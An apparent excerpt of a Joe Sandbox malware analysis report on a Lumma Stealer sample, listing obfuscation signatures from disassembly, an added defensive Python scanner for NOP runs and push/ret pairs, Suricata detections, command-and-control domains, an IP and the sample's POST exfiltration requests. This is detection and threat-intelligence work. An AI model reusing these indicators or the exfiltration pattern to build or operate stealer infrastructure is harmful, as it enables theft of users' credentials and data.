Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then mov edx, ebp | 0_2_00425E70
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then jmp dword ptr [004455F4h] | 0_2_00425E30
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then mov ecx, eax | 0_2_0043AEC0
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then xor byte ptr [esp+eax+17h], al | 0_2_00408F50
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then mov byte ptr [edi], bl | 0_2_00408F50
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then mov ebx, dword ptr [edi+04h] | 0_2_0042A700
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then mov byte ptr [esi], al | 0_2_0041BF14
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then mov eax, dword ptr [ebx+edi+44h] | 0_2_00419F30
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax+423C9D38h] | 0_2_0041E7C0
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then movzx eax, word ptr [edx] | 0_2_004197C2
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then mov word ptr [edi], dx | 0_2_004197C2
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then mov word ptr [esi], cx | 0_2_004197C2
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then mov ecx, ebx | 0_2_0042DFE9
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then jmp ecx | 0_2_0040BFFD
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax+68E75405h] | 0_2_0043EFB0
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax+68E75405h] | 0_2_0212F217
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then mov word ptr [eax], cx | 0_2_0210D230
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then mov word ptr [esi], cx | 0_2_0210D230
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then mov ecx, ebx | 0_2_0211E250
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then jmp ecx | 0_2_020FC264
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then push C0BFD6CCh | 0_2_021132ED
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then add ebp, dword ptr [esp+0Ch] | 0_2_0211B3D7
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then mov ebx, esi | 0_2_021123F7
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then mov word ptr [ebx], cx | 0_2_021123F7
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then cmp word ptr [edi+eax+02h], 0000h | 0_2_021123F7
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax-0Dh] | 0_2_02114031
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then movzx edi, byte ptr [esp+ecx-7D4F88C7h] | 0_2_02108055
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then mov edx, ebp | 0_2_021160D7
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then mov ecx, eax | 0_2_0212B127
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then mov byte ptr [esi], al | 0_2_0210C17B
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then mov eax, dword ptr [ebx+edi+44h] | 0_2_0210A197
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then xor byte ptr [esp+eax+17h], al | 0_2_020F91B7
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then mov byte ptr [edi], bl | 0_2_020F91B7
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then movzx ebx, byte ptr [edx] | 0_2_021256B7
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h] | 0_2_020F7757
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then movzx ecx, word ptr [edi+esi*4] | 0_2_020F7757
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then mov ecx, eax | 0_2_020F97E7
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then mov word ptr [ebp+00h], ax | 0_2_020F97E7
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then mov word ptr [ecx], dx | 0_2_02119444
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then mov ecx, dword ptr [ebp-20h] | 0_2_02119444
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax+61D008CBh] | 0_2_02105487
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then jmp dword ptr [004455F4h] | 0_2_021164DA
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then movzx esi, byte ptr [esp+eax-7D4F867Fh] | 0_2_021064CA
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then mov word ptr [ebx], ax | 0_2_0210B547
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax] | 0_2_0212F597
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then movzx esi, byte ptr [esp+ecx-7D4F867Fh] | 0_2_021075E7
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then cmp word ptr [ebx+edi+02h], 0000h | 0_2_0210D5E7
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax+423C9D38h] | 0_2_0210EA27
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then movzx eax, word ptr [edx] | 0_2_02109A29
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then mov word ptr [edi], dx | 0_2_02109A29
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then mov word ptr [esi], cx | 0_2_02109A29
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then mov edx, ecx | 0_2_02128A77
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then cmp dword ptr [edi+ebp*8], 5E874B5Fh | 0_2_02128A77
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then cmp dword ptr [edx+edi*8], BC9C9AFCh | 0_2_02128A77
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then test eax, eax | 0_2_02128A77
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then jmp eax | 0_2_02119AB5
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then mov word ptr [ecx], bp | 0_2_0210DAB8
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then movzx esi, byte ptr [esp+ecx+6D2CC012h] | 0_2_02104ACD
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then mov byte ptr [edi], al | 0_2_02106B2A
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax+6D2CC012h] | 0_2_02104BD2
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then mov ebx, eax | 0_2_020F5BF7
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then mov ebp, eax | 0_2_020F5BF7
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then cmp dword ptr [ebx+edi*8], 9C259492h | 0_2_0212887B
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then mov eax, dword ptr [0044473Ch] | 0_2_0210C8BA
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then mov ebx, dword ptr [edi+04h] | 0_2_0211A967
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then lea edx, dword ptr [ecx+01h] | 0_2_020FB973
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then jmp eax | 0_2_0212898E
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then movzx esi, byte ptr [ebp+ebx-10h] | 0_2_0212C9CE
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then mov ebx, eax | 0_2_020FDE40
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then mov ebx, eax | 0_2_020FDE40
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then cmp dword ptr [ebp+edi*8+00h], AF697AECh | 0_2_02104E96
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then cmp al, 2Eh | 0_2_02116E96
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then cmp dword ptr [ebp+edi*8+00h], E785F9BAh | 0_2_02104E87
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax+68E75405h] | 0_2_0212EF07
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax+18h] | 0_2_02106F35
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then movzx ebx, byte ptr [esp+ecx-75h] | 0_2_02106F35
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then push 00000000h | 0_2_02119F40
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then mov eax, dword ptr [ebp-68h] | 0_2_02118FA0
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then mov ecx, eax | 0_2_02105FD3
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then mov eax, dword ptr [esp+00000080h] | 0_2_02107C28
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then xor edi, edi | 0_2_02107C28
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then mov esi, eax | 0_2_02105C41
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then mov byte ptr [edi], cl | 0_2_0211CCB0
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then mov byte ptr [esi], al | 0_2_0211DCBC
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then push ebx | 0_2_0212CCFA
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then push esi | 0_2_02117D1A
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then mov byte ptr [edi], cl | 0_2_0211CD37
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then mov byte ptr [edi], cl | 0_2_0211CD78
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then mov byte ptr [edi], cl | 0_2_0211CD89
Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 4x nop then mov word ptr [eax], cx | 0_2_02118DC8
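Two things are worth reading out of the list above. First, the "4x nop then ..." entries are the evidence behind the "Found inlined nop instructions (likely shell or obfuscated code)" signature: compilers emit short NOP runs only for alignment, so long runs inside function bodies point at hand-written or obfuscator-generated code. Second, the hits come in two address ranges, 0x0040xxxx and 0x020Fxxxx-0x0212xxxx, and the same instructions recur in both (for instance push C0BFD6CCh at 0_2_00423086 and 0_2_021132ED, and jmp dword ptr [004455F4h] at 0_2_00425E30 and again at 0_2_021164DA, where the absolute reference still points into the 0x0044xxxx data of the original image). That is the same code present twice in the process, which fits the unpacking signatures at the top of the report and the memory dumps in the 0x020C0000 and 0x020F0000 regions that the YARA rules matched. The following is an added example, not part of the Joe Sandbox report and not code from the sample: a byte-level scan for the two artefacts the report uses as obfuscation markers, NOP runs and the push-immediate/ret pair behind the "code obfuscation techniques (call, push, ret)" signature. It uses no disassembler, so it is a heuristic: a 0x90 run inside data, or 0x68/0xC3 bytes that are operands of other instructions, will also match and need a real disassembly to confirm. CODE and IMAGE_BASE are constructed for the demonstration; hits are printed in the report's own 0_2_<VA> style.

```python
"""
Added example, not part of the Joe Sandbox report and not code from the
sample: heuristic byte scan for inlined NOP runs and push imm32 / ret pairs.
CODE and IMAGE_BASE are constructed, not bytes from SPFFah2O2q.exe.
"""
import re
import struct


def find_nop_runs(code: bytes, base: int, min_run: int = 4):
    """Return (va, run_length, hex of the next 4 bytes) for each NOP run >= min_run."""
    hits = []
    for m in re.finditer(rb"\x90{%d,}" % min_run, code):
        following = code[m.end():m.end() + 4]
        hits.append((base + m.start(), m.end() - m.start(), following.hex()))
    return hits


def find_push_ret(code: bytes, base: int):
    """Return (va, target) for each 'push imm32 ; ret' pair, an obfuscated jmp to imm32."""
    hits = []
    for m in re.finditer(rb"\x68(.{4})\xc3", code, re.DOTALL):
        (target,) = struct.unpack("<I", m.group(1))   # little-endian 32-bit immediate
        hits.append((base + m.start(), target))
    return hits


def report_lines(code: bytes, base: int):
    """Format hits the way the report does: '<n>x nop then ... | 0_2_<VA>'."""
    lines = [f"{n}x nop then bytes {nxt} | 0_2_{va:08X}"
             for va, n, nxt in find_nop_runs(code, base)]
    lines += [f"push {t:08X}h ; ret | 0_2_{va:08X}"
              for va, t in find_push_ret(code, base)]
    return lines


IMAGE_BASE = 0x00400000  # constructed
CODE = (  # constructed byte sequence, not bytes from SPFFah2O2q.exe
    b"\x55\x8b\xec"                  # push ebp ; mov ebp, esp
    b"\x90\x90\x90\x90"              # 4x nop: reported
    b"\x8b\xde"                      # mov ebx, esi
    b"\x68\x90\x12\x40\x00\xc3"      # push 00401290h ; ret  (obfuscated jmp)
    b"\x90\x90"                      # 2x nop: below the threshold, not reported
    b"\x33\xc0\xc3"                  # xor eax, eax ; ret
)

if __name__ == "__main__":
    for line in report_lines(CODE, IMAGE_BASE):
        print(line)
```

Run against a real image, feed it the executable section's bytes and that section's virtual address as base, then run the scan a second time over the unpacked memory dump at its own base: two hit lists whose instruction bytes line up at a constant offset, as they do in the table above, are a quick confirmation that the dump is the unpacked copy of the original code rather than a second stage.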

            Networking

            barindex
            Source: Network traffic | Suricata IDS: 2058364 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat) : 192.168.2.8:54839 -> 1.1.1.1:53
            Source: Network traffic | Suricata IDS: 2058360 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (discokeyus .lat) : 192.168.2.8:64416 -> 1.1.1.1:53
            Source: Network traffic | Suricata IDS: 2058358 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crosshuaht .lat) : 192.168.2.8:58515 -> 1.1.1.1:53
            Source: Network traffic | Suricata IDS: 2058362 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (energyaffai .lat) : 192.168.2.8:52581 -> 1.1.1.1:53
            Source: Network traffic | Suricata IDS: 2058370 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacebudi .lat) : 192.168.2.8:52196 -> 1.1.1.1:53
            Source: Network traffic | Suricata IDS: 2058354 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (aspecteirs .lat) : 192.168.2.8:56154 -> 1.1.1.1:53
            Source: Network traffic | Suricata IDS: 2058376 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sustainskelet .lat) : 192.168.2.8:57407 -> 1.1.1.1:53
            Source: Network traffic | Suricata IDS: 2058374 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rapeflowwj .lat) : 192.168.2.8:58018 -> 1.1.1.1:53
            Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:49706 -> 172.67.157.254:443
            Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49706 -> 172.67.157.254:443
            Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.8:49707 -> 172.67.157.254:443
            Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49707 -> 172.67.157.254:443
            Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.8:49708 -> 172.67.157.254:443
            Source: Network traffic | Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.8:49705 -> 23.55.153.106:443
            Source: Malware configuration extractor | URLs: discokeyus.lat
            Source: Malware configuration extractor | URLs: sustainskelet.lat
            Source: Malware configuration extractor | URLs: necklacebudi.lat
            Source: Malware configuration extractor | URLs: grannyejh.lat
            Source: Malware configuration extractor | URLs: crosshuaht.lat
            Source: Malware configuration extractor | URLs: energyaffai.lat
            Source: Malware configuration extractor | URLs: aspecteirs.lat
            Source: Malware configuration extractor | URLs: rapeflowwj.lat
            Source: Joe Sandbox View | IP Address: 172.67.157.254 172.67.157.254
            Source: Joe Sandbox View | IP Address: 23.55.153.106 23.55.153.106
            Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49706 -> 172.67.157.254:443
            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49705 -> 23.55.153.106:443
            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49709 -> 172.67.157.254:443
            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49708 -> 172.67.157.254:443
            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49707 -> 172.67.157.254:443
            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49711 -> 172.67.157.254:443
            Source: global traffic | HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Host: steamcommunity.com
            Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: lev-tolstoi.com
            Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 74 | Host: lev-tolstoi.com
            Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=8J142MQV1V1XV7FQN | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 12835 | Host: lev-tolstoi.com
            Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=6IMCKCBFIN3LBJ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 15046 | Host: lev-tolstoi.com
            Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=KPY7NXQGMQLQACUMS9 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 20237 | Host: lev-tolstoi.com
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global traffic | HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Host: steamcommunity.com
            Source: global traffic | DNS traffic detected: DNS query: aspecteirs.lat
            Source: global traffic | DNS traffic detected: DNS query: grannyejh.lat
            Source: global traffic | DNS traffic detected: DNS query: discokeyus.lat
            Source: global traffic | DNS traffic detected: DNS query: necklacebudi.lat
            Source: global traffic | DNS traffic detected: DNS query: energyaffai.lat
            Source: global traffic | DNS traffic detected: DNS query: sustainskelet.lat
            Source: global traffic | DNS traffic detected: DNS query: crosshuaht.lat
            Source: global traffic | DNS traffic detected: DNS query: rapeflowwj.lat
            Source: global traffic | DNS traffic detected: DNS query: steamcommunity.com
            Source: global traffic | DNS traffic detected: DNS query: lev-tolstoi.com
            Source: unknown | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: lev-tolstoi.com
            Source: SPFFah2O2q.exe, 00000000.00000003.1510014210.0000000000540000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1533066550.0000000000540000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://127.0.0.1:27060
            Source: SPFFah2O2q.exe, 00000000.00000003.1584367130.0000000002F7D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
            Source: SPFFah2O2q.exe, 00000000.00000003.1584367130.0000000002F7D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
            Source: SPFFah2O2q.exe, 00000000.00000003.1584367130.0000000002F7D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
            Source: SPFFah2O2q.exe, 00000000.00000003.1584367130.0000000002F7D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
            Source: SPFFah2O2q.exe, 00000000.00000003.1584367130.0000000002F7D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
            Source: SPFFah2O2q.exe, 00000000.00000003.1584367130.0000000002F7D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
            Source: SPFFah2O2q.exe, 00000000.00000003.1584367130.0000000002F7D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
            Source: SPFFah2O2q.exe, 00000000.00000003.1584367130.0000000002F7D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
            Source: SPFFah2O2q.exe, 00000000.00000003.1584367130.0000000002F7D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
            Source: SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1533023771.00000000005A4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
            Source: SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://store.steampowered.com/privacy_agreement/
            Source: SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1533023771.00000000005A4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
            Source: Amcache.hve.5.dr | String found in binary or memory: http://upx.sf.net
            Source: SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.valvesoftware.com/legal.htm
            Source: SPFFah2O2q.exe, 00000000.00000003.1584367130.0000000002F7D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.c.lencr.org/0
            Source: SPFFah2O2q.exe, 00000000.00000003.1584367130.0000000002F7D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.i.lencr.org/0
            Source: SPFFah2O2q.exe, 00000000.00000003.1534204760.0000000002EA7000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1534063958.0000000002EAA000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1534124766.0000000002EA7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: SPFFah2O2q.exe, 00000000.00000003.1510014210.0000000000540000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://api.steampowered.com/
            Source: SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509926082.0000000000507000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
            Source: SPFFah2O2q.exe, 00000000.00000003.1534204760.0000000002EA7000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1534063958.0000000002EAA000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1534124766.0000000002EA7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: SPFFah2O2q.exe, 00000000.00000003.1510014210.0000000000540000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.fastly.steamstatic.c
            Source: SPFFah2O2q.exe, 00000000.00000003.1534204760.0000000002EA7000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1534063958.0000000002EAA000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1534124766.0000000002EA7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: SPFFah2O2q.exe, 00000000.00000003.1534204760.0000000002EA7000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1534063958.0000000002EAA000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1534124766.0000000002EA7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: SPFFah2O2q.exe, 00000000.00000003.1510014210.0000000000540000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1533066550.0000000000540000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://checkout.steampowered.com/
